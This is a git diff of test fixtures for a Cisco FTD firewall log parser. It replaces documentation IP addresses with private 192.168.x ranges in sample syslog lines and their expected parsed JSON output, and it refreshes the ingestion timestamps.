[0x71a87d94, 0x0] -Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879 +Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879) +Apr 30 2013 09:22:33: %FTD-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query +Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:38: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:39: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:40: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:41: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:47: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Apr 30 2013 09:22:48: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -> dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.0.2.66/137 to 10.1.2.42/137 on interface inside -Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.0.2.66/12981 to 10.1.5.60/53 due to DNS Query -Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.0.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] -Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.0.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] -Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.0.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:22:56: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:02: %FTD-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside +Apr 30 2013 09:23:03: %FTD-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 10.1.5.60/53 due to DNS Query +Apr 30 2013 09:23:06: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2009) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:08: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49776) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:15: %FTD-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2010) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:24: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2011) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:34: %FTD-5-106100: access-list acl_in denied tcp inside/10.0.0.16(2012) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:40: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:41: %FTD-4-106023: Deny tcp src outside:192.168.2.126/53638 dst inside:10.0.0.132/8111 by access-group "acl_out" [0x71761f18, 0x0] +Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.46(49840) -> outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 30 2013 09:23:43: %FTD-5-106100: access-list acl_in est-allowed tcp inside/10.0.0.16(2013) -> outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] +Apr 15 2018 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2241) -> outside/192.168.0.99(2000) hit-cnt 1 first hit [0x71a87d94, 0x0] Dec 11 2018 08:01:24 127.0.0.1: %FTD-6-302015: Built outbound UDP connection 447235 for outside:192.168.77.12/11180 (192.168.77.12/11180) to identity:10.0.13.13/80 (10.0.13.13/80) -Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.0.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] -Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) -Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.0.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.0.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside -Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] -Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) -Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs +Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:24 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.33/5555 dst outside:192.168.0.12/53 by access-group "dmz" [0x123a465e, 0x4c7bf613] +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447236 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:OCSP_Server/5678 (OCSP_Server/5678) +Dec 11 2018 08:01:31 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447236 for outside:192.168.2.222/1234 to dmz:192.168.1.34/5678 duration 0:00:00 bytes 14804 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447234 for outside:192.168.2.222/1234 to dmz:192.168.1.35/5678 duration 0:01:08 bytes 134781 TCP FINs +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:38 127.0.0.1: %FTD-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside +Dec 11 2018 08:01:39 127.0.0.1: %FTD-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group "dmz" [0x123a465e, 0x8c20f21] +Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000) +Dec 11 2018 08:01:53 127.0.0.1: %FTD-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs Aug 15 2012 23:30:09: %FTD-6-302016: Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416 -Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic -Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic -Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic +Sep 12 2014 06:50:53 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:01 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:05 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic +Sep 12 2014 06:51:06 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic +Sep 12 2014 06:51:17 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic Sep 12 2014 06:52:48 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic Sep 12 2014 06:53:00 GIFRCHN01 : %FTD-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic -Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" +Sep 12 2014 06:53:01 GIFRCHN01 : %FTD-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group "PERMIT_IN" [0x0, 0x0]" Sep 12 2014 06:53:02 GIFRCHN01 : %FTD-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside Jan 14 2015 13:16:13: %FTD-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session -Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com -Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.225/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/8080), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware -Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app -Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com -Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside +Jan 14 2015 13:16:14: %FTD-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com +Jan 14 2015 13:16:14: %FTD-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.225/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Jan 14 2015 13:16:14: %FTD-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/8080), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware +Nov 16 2009 14:12:35: %FTD-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app +Nov 16 2009 14:12:36: %FTD-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com +Nov 16 2009 14:12:37: %FTD-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json index 4c62577d4d2..7fda427d8c5 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-sample.log-expected.json @@ -6,8 +6,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -43,13 +43,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994086451Z", - "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:33:04.305642200Z", + "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -76,8 +76,8 @@ }, "destination": { "port": 53, - "address": "192.0.0.8", - "ip": "192.0.0.8" + "address": "192.168.0.8", + "ip": "192.168.0.8" }, "source": { "port": 63016, @@ -113,13 +113,13 @@ "related": { "ip": [ "10.1.2.30", - "192.0.0.8" + "192.168.0.8" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:48.994092726Z", - "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.0.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", + "ingested": "2021-12-09T13:33:04.305651100Z", + "original": "Apr 15 2013 09:36:50: %FTD-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -146,8 +146,8 @@ }, "destination": { "port": 2000, - "address": "192.0.0.89", - "ip": "192.0.0.89" + "address": "192.168.0.89", + "ip": "192.168.0.89" }, "source": { "port": 2241, @@ -183,13 +183,13 @@ "related": { "ip": [ "10.1.2.16", - "192.0.0.89" + "192.168.0.89" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:48.994094922Z", - "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.0.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", + "ingested": "2021-12-09T13:33:04.305656700Z", + "original": "Apr 15 2014 09:34:34 EDT: %FTD-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -217,8 +217,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.10", - "ip": "192.0.2.10" + "address": "192.168.2.10", + "ip": "192.168.2.10" }, "source": { "port": 1039, @@ -258,7 +258,7 @@ ], "ip": [ "172.29.2.101", - "192.0.2.10" + "192.168.2.10" ] }, "host": { @@ -266,8 +266,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994096834Z", - "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.0.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", + "ingested": "2021-12-09T13:33:04.305662Z", + "original": "Apr 24 2013 16:00:28 INT-FW01 : %FTD-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -294,8 +294,8 @@ }, "destination": { "port": 53, - "address": "192.0.2.57", - "ip": "192.0.2.57" + "address": "192.168.2.57", + "ip": "192.168.2.57" }, "source": { "port": 1065, @@ -335,7 +335,7 @@ ], "ip": [ "172.29.2.3", - "192.0.2.57" + "192.168.2.57" ] }, "host": { @@ -343,8 +343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994098624Z", - "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.0.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", + "ingested": "2021-12-09T13:33:04.305667500Z", + "original": "Apr 24 2013 16:00:27 INT-FW01 : %FTD-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -371,8 +371,8 @@ }, "destination": { "port": 12834, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4952, @@ -408,13 +408,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994100450Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.0.2.130/12834", + "ingested": "2021-12-09T13:33:04.305672900Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -446,8 +446,8 @@ }, "source": { "port": 443, - "address": "192.0.2.43", - "ip": "192.0.2.43" + "address": "192.168.2.43", + "ip": "192.168.2.43" }, "tags": [ "preserve_original_event" @@ -478,14 +478,14 @@ }, "related": { "ip": [ - "192.0.2.43", + "192.168.2.43", "10.123.3.42" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994102296Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.0.2.43/443 (192.0.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", + "ingested": "2021-12-09T13:33:04.305678200Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -501,7 +501,7 @@ "destination_interface": "outside", "mapped_source_port": 443, "mapped_destination_ip": "10.123.3.42", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743274", "source_interface": "outside", "mapped_destination_port": 12834 @@ -514,8 +514,8 @@ }, "destination": { "port": 25882, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 52925, @@ -551,13 +551,13 @@ "related": { "ip": [ "10.123.1.35", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994104178Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.0.2.130/25882", + "ingested": "2021-12-09T13:33:04.305683500Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -589,11 +589,11 @@ }, "source": { "nat": { - "ip": "192.0.2.43" + "ip": "192.168.2.43" }, - "address": "192.0.2.222", + "address": "192.168.2.222", "port": 53, - "ip": "192.0.2.222" + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -624,15 +624,15 @@ }, "related": { "ip": [ - "192.0.2.222", - "192.0.2.43", + "192.168.2.222", + "192.168.2.43", "10.123.1.35" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994106029Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.0.2.222/53 (192.0.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", + "ingested": "2021-12-09T13:33:04.305688800Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -648,7 +648,7 @@ "destination_interface": "outside", "mapped_source_port": 53, "mapped_destination_ip": "10.123.1.35", - "mapped_source_ip": "192.0.2.43", + "mapped_source_ip": "192.168.2.43", "connection_id": "89743275", "source_interface": "outside", "mapped_destination_port": 25882 @@ -661,8 +661,8 @@ }, "destination": { "port": 45392, - "address": "192.0.2.130", - "ip": "192.0.2.130" + "address": "192.168.2.130", + "ip": "192.168.2.130" }, "source": { "port": 4953, @@ -698,13 +698,13 @@ "related": { "ip": [ "10.123.3.42", - "192.0.2.130" + "192.168.2.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994107813Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.0.2.130/45392", + "ingested": "2021-12-09T13:33:04.305694200Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -737,8 +737,8 @@ }, "source": { "port": 80, - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "tags": [ "preserve_original_event" @@ -769,15 +769,15 @@ }, "related": { "ip": [ - "192.0.2.1", + "192.168.2.1", "10.123.3.42", "10.123.3.130" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:48.994109640Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.0.2.1/80 (192.0.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", + "ingested": "2021-12-09T13:33:04.305699600Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -793,7 +793,7 @@ "destination_interface": "outside", "mapped_source_port": 80, "mapped_destination_ip": "10.123.3.130", - "mapped_source_ip": "192.0.2.1", + "mapped_source_ip": "192.168.2.1", "connection_id": "89743276", "source_interface": "outside", "mapped_destination_port": 45392 @@ -811,8 +811,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -843,15 +843,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.123.1.35" ] }, "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-07-19T09:06:48.994111745Z", - "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.0.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", + "ingested": "2021-12-09T13:33:04.305705400Z", + "original": "Apr 29 2013 12:59:50: %FTD-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", "start": "2013-04-29T11:36:05.000Z", @@ -884,8 +884,8 @@ }, "source": { "port": 53, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -916,15 +916,15 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", 